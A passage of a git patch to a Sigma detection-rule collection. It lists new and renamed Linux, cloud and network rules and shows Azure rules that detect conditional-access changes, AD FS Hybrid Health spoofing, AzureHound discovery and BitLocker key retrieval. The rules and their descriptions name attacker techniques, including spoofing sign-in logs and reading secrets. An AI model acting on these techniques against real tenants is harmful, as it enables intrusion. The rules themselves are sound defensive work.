src/main/resources/rules/azure/azure_pim_account_stale.yml create mode 100644 src/main/resources/rules/azure/azure_pim_activation_approve_deny.yml create mode 100644 src/main/resources/rules/azure/azure_pim_alerts_disabled.yml create mode 100644 src/main/resources/rules/azure/azure_pim_change_settings.yml create mode 100644 src/main/resources/rules/azure/azure_pim_invalid_license.yml create mode 100644 src/main/resources/rules/azure/azure_pim_role_assigned_outside_of_pim.yml create mode 100644 src/main/resources/rules/azure/azure_pim_role_frequent_activation.yml create mode 100644 src/main/resources/rules/azure/azure_pim_role_no_mfa_required.yml create mode 100644 src/main/resources/rules/azure/azure_pim_role_not_used.yml create mode 100644 src/main/resources/rules/azure/azure_pim_too_many_global_admins.yml create mode 100644 src/main/resources/rules/azure/azure_priviledged_role_assignment_add.yml create mode 100644 src/main/resources/rules/azure/azure_priviledged_role_assignment_bulk_change.yml create mode 100644 src/main/resources/rules/azure/azure_privileged_account_creation.yml create mode 100644 src/main/resources/rules/azure/azure_tap_added.yml create mode 100644 src/main/resources/rules/azure/azure_user_password_change.yml create mode 100644 src/main/resources/rules/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_console_getsignintoken.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_delete_identity.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_disable_bucket_versioning.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_enum_buckets.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_sso_idp_change.yml create mode 100644 src/main/resources/rules/github/github_push_protection_bypass_detected.yml create mode 100644 src/main/resources/rules/github/github_push_protection_disabled.yml create mode 100644 src/main/resources/rules/github/github_secret_scanning_feature_disabled.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_application_access_levels_modified.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_application_removed.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_granted_domain_api_access.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_mfa_disabled.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_role_privilege_deleted.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml delete mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml create mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml create mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml delete mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml delete mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml delete mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml create mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml create mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml create mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml create mode 100644 src/main/resources/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml rename src/main/resources/rules/linux/{other/lnx_clamav.yml => builtin/clamav/lnx_clamav_relevant_message.yml} (76%) rename src/main/resources/rules/linux/builtin/{lnx_crontab_file_modification.yml => cron/lnx_cron_crontab_file_modification.yml} (54%) create mode 100644 src/main/resources/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml create mode 100644 src/main/resources/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml create mode 100644 src/main/resources/rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml create mode 100644 src/main/resources/rules/linux/builtin/lnx_privileged_user_creation.yml delete mode 100644 src/main/resources/rules/linux/builtin/lnx_proxy_connection.yml delete mode 100644 src/main/resources/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml delete mode 100644 src/main/resources/rules/linux/builtin/lnx_setgid_setuid.yml delete mode 100644 src/main/resources/rules/linux/builtin/lnx_shell_priv_esc_prep.yml create mode 100644 src/main/resources/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml create mode 100644 src/main/resources/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml rename src/main/resources/rules/linux/builtin/{ => sudo}/lnx_sudo_cve_2019_14287_user.yml (85%) rename src/main/resources/rules/linux/{other/lnx_security_tools_disabling_syslog.yml => builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml} (56%) create mode 100644 src/main/resources/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml create mode 100644 src/main/resources/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml delete mode 100644 src/main/resources/rules/linux/file_create/file_create_lnx_cron_files.yml rename src/main/resources/rules/linux/{file_create/file_create_lnx_doas_conf_creation.yml => file_event/file_event_lnx_doas_conf_creation.yml} (92%) create mode 100644 src/main/resources/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml create mode 100644 src/main/resources/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml create mode 100644 src/main/resources/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml create mode 100644 src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml create mode 100644 src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml create mode 100644 src/main/resources/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml delete mode 100644 src/main/resources/rules/linux/modsecurity/modsec_mulitple_blocks.yml create mode 100644 src/main/resources/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml delete mode 100644 src/main/resources/rules/linux/other/lnx_ssh_cve_2018_15473.yml delete mode 100644 src/main/resources/rules/linux/other/lnx_susp_failed_logons_single_source.yml delete mode 100644 src/main/resources/rules/linux/other/lnx_susp_guacamole.yml delete mode 100644 src/main/resources/rules/linux/other/lnx_susp_named.yml delete mode 100644 src/main/resources/rules/linux/other/lnx_susp_ssh.yml delete mode 100644 src/main/resources/rules/linux/other/lnx_susp_vsftp.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_groupdel.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_kill_process.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml delete mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_remove_package.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml rename src/main/resources/rules/linux/{builtin/lnx_sudo_cve_2019_14287.yml => process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml} (76%) create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_userdel.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml create mode 100644 src/main/resources/rules/m365/microsoft365_disabling_mfa.yml create mode 100644 src/main/resources/rules/m365/microsoft365_new_federated_domain_added_audit.yml create mode 100644 src/main/resources/rules/m365/microsoft365_new_federated_domain_added_exchange.yml create mode 100644 src/main/resources/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml create mode 100644 src/main/resources/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml create mode 100644 src/main/resources/rules/network/firewall/net_firewall_cleartext_protocols.yml diff --git a/src/main/resources/rules/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml b/src/main/resources/rules/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml new file mode 100644 index 000000000..404b48e3b --- /dev/null +++ b/src/main/resources/rules/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml @@ -0,0 +1,24 @@ +title: CA Policy Removed by Non Approved Actor +id: 26e7c5e2-6545-481e-b7e6-050143459635 +status: test +description: Monitor and alert on conditional access changes where non approved actor removed CA Policy. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access +author: Corissa Koopmans, '@corissalea' +date: 2022/07/19 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1548 + - attack.t1556 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Delete conditional access policy + condition: selection +falsepositives: + - Misconfigured role permissions + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. +level: medium diff --git a/src/main/resources/rules/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml b/src/main/resources/rules/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml new file mode 100644 index 000000000..1169df50d --- /dev/null +++ b/src/main/resources/rules/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml @@ -0,0 +1,24 @@ +title: CA Policy Updated by Non Approved Actor +id: 50a3c7aa-ec29-44a4-92c1-fce229eef6fc +status: test +description: Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access +author: Corissa Koopmans, '@corissalea' +date: 2022/07/19 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1548 + - attack.t1556 +logsource: + product: azure + service: auditlogs +detection: + keywords: + - Update conditional access policy + condition: keywords +falsepositives: + - Misconfigured role permissions + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. +level: medium diff --git a/src/main/resources/rules/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml b/src/main/resources/rules/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml new file mode 100644 index 000000000..e6a374399 --- /dev/null +++ b/src/main/resources/rules/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml @@ -0,0 +1,22 @@ +title: New CA Policy by Non-approved Actor +id: 0922467f-db53-4348-b7bf-dee8d0d348c6 +status: test +description: Monitor and alert on conditional access changes. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure +author: Corissa Koopmans, '@corissalea' +date: 2022/07/18 +tags: + - attack.defense_evasion + - attack.t1548 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Add conditional access policy + condition: selection +falsepositives: + - Misconfigured role permissions + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. +level: medium diff --git a/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_new_server.yml b/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_new_server.yml index 7ea030282..330590535 100644 --- a/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_new_server.yml +++ b/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_new_server.yml @@ -1,27 +1,28 @@ title: Azure Active Directory Hybrid Health AD FS New Server id: 288a39fc-4914-4831-9ada-270e9dc12cb4 +status: test description: | - This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. - A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. - This can be done programmatically via HTTP requests to Azure. -status: experimental -date: 2021/08/26 + This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. + A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. + This can be done programmatically via HTTP requests to Azure. +references: + - https://o365blog.com/post/hybridhealthagent/ author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +date: 2021/08/26 +modified: 2023/10/11 tags: - - attack.defense_evasion - - attack.t1578 -references: - - https://o365blog.com/post/hybridhealthagent/ + - attack.defense_evasion + - attack.t1578 logsource: - product: azure - service: azureactivity + product: azure + service: activitylogs detection: - selection: - CategoryValue: 'Administrative' - ResourceProviderValue: 'Microsoft.ADHybridHealthService' - ResourceId|contains: 'AdFederationService' - OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action' - condition: selection + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action' + condition: selection falsepositives: - - Legitimate AD FS servers added to an AAD Health AD FS service instance + - Legitimate AD FS servers added to an AAD Health AD FS service instance level: medium diff --git a/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_service_delete.yml b/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_service_delete.yml index 9d1966ce1..e3b8547b6 100644 --- a/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_service_delete.yml +++ b/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_service_delete.yml @@ -1,27 +1,28 @@ title: Azure Active Directory Hybrid Health AD FS Service Delete id: 48739819-8230-4ee3-a8ea-e0289d1fb0ff +status: test description: | - This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. - A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. - The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure. -status: experimental -date: 2021/08/26 + This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. + A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. + The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure. +references: + - https://o365blog.com/post/hybridhealthagent/ author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +date: 2021/08/26 +modified: 2023/10/11 tags: - - attack.defense_evasion - - attack.t1578.003 -references: - - https://o365blog.com/post/hybridhealthagent/ + - attack.defense_evasion + - attack.t1578.003 logsource: - product: azure - service: azureactivity + product: azure + service: activitylogs detection: - selection: - CategoryValue: 'Administrative' - ResourceProviderValue: 'Microsoft.ADHybridHealthService' - ResourceId|contains: 'AdFederationService' - OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete' - condition: selection + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete' + condition: selection falsepositives: - - Legitimate AAD Health AD FS service instances being deleted in a tenant + - Legitimate AAD Health AD FS service instances being deleted in a tenant level: medium diff --git a/src/main/resources/rules/azure/azure_account_lockout.yml b/src/main/resources/rules/azure/azure_account_lockout.yml index 102f1de5c..05b4393d7 100644 --- a/src/main/resources/rules/azure/azure_account_lockout.yml +++ b/src/main/resources/rules/azure/azure_account_lockout.yml @@ -1,21 +1,22 @@ title: Account Lockout id: 2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a -status: experimental -author: AlertIQ -date: 2021/10/10 +status: test description: Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password. references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: AlertIQ +date: 2021/10/10 +modified: 2022/12/25 +tags: + - attack.credential_access + - attack.t1110 logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection: - ResultType: 50053 - condition: selection -level: medium + selection: + ResultType: 50053 + condition: selection falsepositives: - - Unknown -tags: - - attack.credential_access - - attack.t1110 + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_ad_account_created_deleted.yml b/src/main/resources/rules/azure/azure_ad_account_created_deleted.yml new file mode 100644 index 000000000..91bc6265f --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_account_created_deleted.yml @@ -0,0 +1,25 @@ +title: Account Created And Deleted Within A Close Time Frame +id: 6f583da0-3a90-4566-a4ed-83c09fe18bbf +status: test +description: Detects when an account was created and deleted in a short period of time. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts +author: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton +date: 2022/08/11 +modified: 2022/08/18 +tags: + - attack.defense_evasion + - attack.t1078 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: + - Add user + - Delete user + Status: Success + condition: selection +falsepositives: + - Legit administrative action +level: high diff --git a/src/main/resources/rules/azure/azure_ad_auth_failure_increase.yml b/src/main/resources/rules/azure/azure_ad_auth_failure_increase.yml new file mode 100644 index 000000000..e239a5655 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_auth_failure_increase.yml @@ -0,0 +1,22 @@ +title: Increased Failed Authentications Of Any Type +id: e1d02b53-c03c-4948-b11d-4d00cca49d03 +status: test +description: Detects when sign-ins increased by 10% or greater. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins +author: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1' +date: 2022/08/11 +tags: + - attack.defense_evasion + - attack.t1078 +logsource: + product: azure + service: signinlogs +detection: + selection: + Status: failure + Count: "<10%" + condition: selection +falsepositives: + - Unlikely +level: medium diff --git a/src/main/resources/rules/azure/azure_ad_auth_sucess_increase.yml b/src/main/resources/rules/azure/azure_ad_auth_sucess_increase.yml new file mode 100644 index 000000000..3c4751ae4 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_auth_sucess_increase.yml @@ -0,0 +1,23 @@ +title: Measurable Increase Of Successful Authentications +id: 67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae +status: test +description: Detects when successful sign-ins increased by 10% or greater. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins +author: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton +date: 2022/08/11 +modified: 2022/08/18 +tags: + - attack.defense_evasion + - attack.t1078 +logsource: + product: azure + service: signinlogs +detection: + selection: + Status: Success + Count: "<10%" + condition: selection +falsepositives: + - Increase of users in the environment +level: low diff --git a/src/main/resources/rules/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml b/src/main/resources/rules/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml new file mode 100644 index 000000000..4f4495d31 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml @@ -0,0 +1,23 @@ +title: Authentications To Important Apps Using Single Factor Authentication +id: f272fb46-25f2-422c-b667-45837994980f +status: test +description: Detect when authentications to important application(s) only required single-factor authentication +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts +author: MikeDuddington, '@dudders1' +date: 2022/07/28 +tags: + - attack.initial_access + - attack.t1078 +logsource: + product: azure + service: signinlogs +detection: + selection: + Status: 'Success' + AppId: 'Insert Application ID use OR for multiple' + AuthenticationRequirement: 'singleFactorAuthentication' + condition: selection +falsepositives: + - If this was approved by System Administrator. +level: medium diff --git a/src/main/resources/rules/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml b/src/main/resources/rules/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml new file mode 100644 index 000000000..9aa985a10 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml @@ -0,0 +1,25 @@ +title: Successful Authentications From Countries You Do Not Operate Out Of +id: 8c944ecb-6970-4541-8496-be554b8e2846 +status: test +description: Detect successful authentications from countries you do not operate out of. +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts +author: MikeDuddington, '@dudders1' +date: 2022/07/28 +tags: + - attack.initial_access + - attack.credential_access + - attack.t1078.004 + - attack.t1110 +logsource: + product: azure + service: signinlogs +detection: + selection: + Status: 'Success' + filter: + Location|contains: '' + condition: selection and not filter +falsepositives: + - If this was approved by System Administrator. +level: medium diff --git a/src/main/resources/rules/azure/azure_ad_azurehound_discovery.yml b/src/main/resources/rules/azure/azure_ad_azurehound_discovery.yml new file mode 100644 index 000000000..097458432 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_azurehound_discovery.yml @@ -0,0 +1,23 @@ +title: Discovery Using AzureHound +id: 35b781cc-1a08-4a5a-80af-42fd7c315c6b +status: test +description: Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication. +references: + - https://github.com/BloodHoundAD/AzureHound +author: Janantha Marasinghe +date: 2022/11/27 +tags: + - attack.discovery + - attack.t1087.004 + - attack.t1526 +logsource: + product: azure + service: signinlogs +detection: + selection: + userAgent|contains: 'azurehound' + ResultType: 0 + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/azure/azure_ad_bitlocker_key_retrieval.yml b/src/main/resources/rules/azure/azure_ad_bitlocker_key_retrieval.yml new file mode 100644 index 000000000..79aa10833 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_bitlocker_key_retrieval.yml @@ -0,0 +1,22 @@ +title: Bitlocker Key Retrieval +id: a0413867-daf3-43dd-9245-734b3a787942 +status: test +description: Monitor and alert for Bitlocker key retrieval. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval +author: Michael Epping, '@mepples21' +date: 2022/06/28 +tags: + - attack.defense_evasion + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: KeyManagement + OperationName: Read BitLocker key + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_ad_device_registration_or_join_without_mfa.yml b/src/main/resources/rules/azure/azure_ad_device_registration_or_join_without_mfa.yml new file mode 100644 index 000000000..51f92e935 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_device_registration_or_join_without_mfa.yml @@ -0,0 +1,24 @@ +title: Device Registration or Join Without MFA +id: 5afa454e-030c-4ab4-9253-a90aa7fcc581 +status: test +description: Monitor and alert for device registration or join events where MFA was not performed. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy +author: Michael Epping, '@mepples21' +date: 2022/06/28 +tags: + - attack.defense_evasion + - attack.t1078.004 +logsource: + product: azure + service: signinlogs +detection: + selection: + ResourceDisplayName: 'Device Registration Service' + conditionalAccessStatus: 'success' + filter_mfa: + AuthenticationRequirement: 'multiFactorAuthentication' + condition: selection and not filter_mfa +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_ad_device_registration_policy_changes.yml b/src/main/resources/rules/azure/azure_ad_device_registration_policy_changes.yml new file mode 100644 index 000000000..dac899544 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_device_registration_policy_changes.yml @@ -0,0 +1,23 @@ +title: Changes to Device Registration Policy +id: 9494bff8-959f-4440-bbce-fb87a208d517 +status: test +description: Monitor and alert for changes to the device registration policy. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy +author: Michael Epping, '@mepples21' +date: 2022/06/28 +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1484 +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: 'Policy' + ActivityDisplayName: 'Set device registration policies' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml b/src/main/resources/rules/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml new file mode 100644 index 000000000..8dc43efa0 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml @@ -0,0 +1,25 @@ +title: Failed Authentications From Countries You 